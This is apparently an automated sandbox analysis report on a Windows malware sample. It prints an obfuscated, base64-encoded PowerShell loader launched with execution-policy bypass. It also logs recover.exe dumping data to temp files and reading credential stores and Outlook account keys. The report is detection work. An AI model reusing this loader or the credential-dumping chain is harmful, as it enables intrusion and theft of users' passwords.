Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZH

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,

12_2_004053E1

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10002806 push ecx; ret	5_2_10002819
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04E042D7 push ebx; ret	5_2_04E042DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0763CB5C push eax; retf	5_2_0763CB5D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00446B75 push ecx; ret	12_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00452BB4 push eax; ret	12_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044DDB0 push eax; ret	12_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044DDB0 push eax; ret	12_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044B090 push eax; ret	13_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044B090 push eax; ret	13_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00451D34 push eax; ret	13_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00444E71 push ecx; ret	13_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414060 push eax; ret	16_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414060 push eax; ret	16_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414039 push ecx; ret	16_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004164EB push 0000006Ah; retf	16_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00416553 push 0000006Ah; retf	16_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00416555 push 0000006Ah; retf	16_2_004165C4

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

13_2_004047CB

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
